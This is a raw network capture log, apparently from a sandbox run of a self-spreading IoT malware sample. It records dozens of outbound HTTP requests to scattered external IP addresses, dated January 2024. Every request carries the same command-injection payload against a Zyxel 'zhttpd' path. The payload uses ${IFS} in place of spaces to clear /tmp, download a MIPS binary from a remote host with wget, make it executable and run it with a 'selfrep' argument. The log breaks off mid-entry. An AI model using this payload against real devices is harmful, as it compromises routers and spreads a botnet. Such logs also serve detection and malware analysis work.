                                              Jan 29, 2024 07:03:55.116154909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5703192.168.2.1453414223.49.238.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116204023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5704192.168.2.1445870153.29.68.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116230965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5705192.168.2.1444188210.46.77.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116244078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5706192.168.2.1447174216.176.100.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116306067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5707192.168.2.1460744192.32.227.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116333008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5708192.168.2.1445562221.49.49.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116369963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5709192.168.2.1439634153.73.173.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116430998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5710192.168.2.143922281.181.10.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116455078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5711192.168.2.1444098168.6.246.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116487026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5712192.168.2.1436894200.233.57.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116544008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5713192.168.2.1438562210.229.224.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116565943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5714192.168.2.1448070186.182.189.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116595984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5715192.168.2.143935283.96.236.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116632938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5716192.168.2.145406858.240.57.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116693974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5717192.168.2.1447322164.51.95.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116749048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5718192.168.2.1442598192.28.212.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116780996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5719192.168.2.144805084.118.188.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116818905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5720192.168.2.144286667.26.63.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116858959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5721192.168.2.1444398153.225.89.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116899014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5722192.168.2.145057096.19.101.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116936922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5723192.168.2.1438366176.253.131.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116978884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5724192.168.2.1435160103.116.148.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116997957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5725192.168.2.145043851.214.44.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117027998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5726192.168.2.1435660166.127.171.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117075920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5727192.168.2.1456012145.56.118.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117113113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5728192.168.2.144536264.78.191.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117166042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5729192.168.2.1455556114.187.201.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117188931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5730192.168.2.145305473.234.226.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117235899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5731192.168.2.143734849.110.25.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117265940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5732192.168.2.1433706147.215.87.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117291927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5733192.168.2.143842027.223.156.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117348909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5734192.168.2.144256043.111.160.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117371082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5735192.168.2.1456022198.143.246.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117412090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5736192.168.2.144674473.51.237.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117461920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5737192.168.2.1458150111.200.153.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117496014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5738192.168.2.1435924181.18.76.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117522955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5739192.168.2.1434468207.33.140.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117556095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5740192.168.2.1453540156.247.20.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117613077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5741192.168.2.1440604180.9.98.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117626905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5742192.168.2.1450580170.27.152.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117650032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5743192.168.2.144910673.97.59.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117683887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5744192.168.2.1434768120.133.81.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117733002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5745192.168.2.1438590157.185.101.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117765903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5746192.168.2.1457692115.243.26.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117810011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5747192.168.2.1446046164.178.253.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117840052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5748192.168.2.145470471.183.180.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117896080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5749192.168.2.1435724160.68.73.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117923975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5750192.168.2.1451158161.140.176.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.117960930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5751192.168.2.1434126171.36.77.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118001938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5752192.168.2.144134641.190.89.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118046045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5753192.168.2.1452282192.98.212.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118079901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5754192.168.2.1433568128.161.118.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118136883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5755192.168.2.144477269.15.138.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118161917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5756192.168.2.1432890153.117.209.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118189096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5757192.168.2.1448312189.115.238.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118227959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5758192.168.2.1433684132.122.48.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118282080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5759192.168.2.1444680182.126.200.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118304968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5760192.168.2.143523814.181.236.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118340015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5761192.168.2.144111672.50.198.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.118383884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5762192.168.2.144127470.29.10.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121606112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5763192.168.2.1452654192.173.108.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121638060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5764192.168.2.144912264.58.195.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121671915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5765192.168.2.1433290196.60.215.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.121710062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5766192.168.2.1447722181.101.219.167443
                                              TimestampBytes transferredDirectionData
